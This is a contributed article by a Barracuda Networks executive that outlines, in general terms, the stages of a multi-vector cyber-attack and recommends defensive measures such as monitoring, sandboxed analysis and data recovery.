Modern cyber-attackers are no longer tech savvy opportunists, they are highly organised criminal groups operating against sophisticated plans and strategies. Many now conduct extensive reconnaissance on victims before carrying out attacks designed to inflict significant damage in a very short space of time. The majority of these attacks are multi-vector in nature, meaning they combine several different types of cyber-attack (such as spear-phishing and ransomware) into one sustained assault on the victim's network. Unfortunately it's a highly effective approach. If just one part of a system is unprotected, a multi-vector attack will usually be able to find and exploit it.
The bad news is that it's getting worse, too. A recent Osterman report found that both phishing and crypto ransomware attacks are increasing at the rate of several hundred percent per quarter, a trend that is expected to continue for at least the next 18 to 24 months.
The growing threat of multi vector attacks
In the past, when attackers wanted to infiltrate a network they would almost always target systems, servers and computers because these were seen to be the most vulnerable components. However, this approach was difficult and did not always guarantee success. Today, attackers focus on a far easier point of network vulnerability - the users. Not only do all network users have internet access, but many operate across multiple devices, including personal devices that don't have the latest security updates on them. All of this creates a plethora of attack vectors and vulnerability points, which are easy to exploit. But how does a multi-vector attack actually work in practice? Below is an example of the typical process criminals follow:
1. Automatic reconnaissance – Cyber-attacks today rarely begin with a full frontal assault on the target organisation. First, criminals carry out detailed reconnaissance, finding small contractors who work with the intended victim and have access to its network, but whose cyber-security is less advanced.
2. Gain access to credentials - Once these more vulnerable partners and contractors have been found, a combination of social engineering and spyware is used to acquire valid credentials for the target victim's network.
3. Use credentials for backdoor entry - With credentials secured, they can enter silently the network using any one of a number of backdoors. The larger, more complex a network is, the more backdoors it generally has.
4. Install APT/Ransomware – Once in, the real damage begins. Criminals can install advanced persistent threats and ransomware, many of which are polymorphic in nature, making them very hard to identify and eradicate.
5. Damage/Deface/Steal Data – These attacks then cause maximum damage in the network, deface websites, and steal both organisational and customer data.
6. Launch spear-phishing campaign – In tandem with step five, specifically targeted spear-phishing attacks are also launched, aimed at important individuals within the organisation such as the CEO, board members and those working in the finance or accounts payable departments.
7. Demand Ransom – Finally, if ransomware was installed at stage four, these are then detonated and ransoms demanded from the victim.
Levelling the playing field
The threat of comprehensive attacks requires comprehensive defences. Businesses can significantly improve their defences by ensuring a thorough cyber-security setup is in place with the following key measures:
Monitor and secure all possible threat vectors
Providing end-to-end security isn't easy, and IT teams should start by taking three key steps:
- Detect: Have the capability to understand what's going on with monitoring software. Ensure IT teams and staff are well trained, scan email inboxes regularly and make sure that threats can be pinpointed down to a specific device.
- Prevent: Utilise preventative measures such as scanning for web app vulnerabilities and existing spyware. Implement Advanced Threat Detection if possible.
- Recover: Ensure all data is recoverable.
Update security measures to fit with the Cloud
The Cloud is becoming increasingly common amongst businesses of all sizes. As Cloud adoption grows, make sure security measures adapt accordingly. Adopting a range of solutions designed to work in the Cloud allows businesses to analyse and protect hosted data more effectively.
Implement static and dynamic security measures
Utilising both static and dynamic methods of threat detection will help ensure all potential threats are picked up:
- Static Analysis - Heuristic scanning uses a predefined set of rules and algorithms to seek out any commands present in the system that might indicate malicious activity. Signature-based scanning also matches digital signatures that are found in known malware to files present on the network.
- Dynamic Analysis – By using a fully Cloud-based system emulator within a sandbox, organisations can open and examine files without putting the system at risk from malicious attachments.
Plan for the worst - ensure all data is recoverable
Corrupted, damaged or stolen data will always cause problems for a business, but especially so if it cannot be recovered. Ensure data across all platforms is recoverable so even if the worst does happen, the damage is limited.
Today's business world is one where complex, sustained cyber-attacks are increasingly commonplace. However, this doesn't mean businesses are powerless to prevent themselves from becoming the next victim. Implementing a comprehensive and well thought out cyber-defence strategy can level the playing field against even the most intricate multi-vector attacks, thwarting attackers and protecting precious data.
Contributed by Wieland Alge, VP and GM EMEA, Barracuda Networks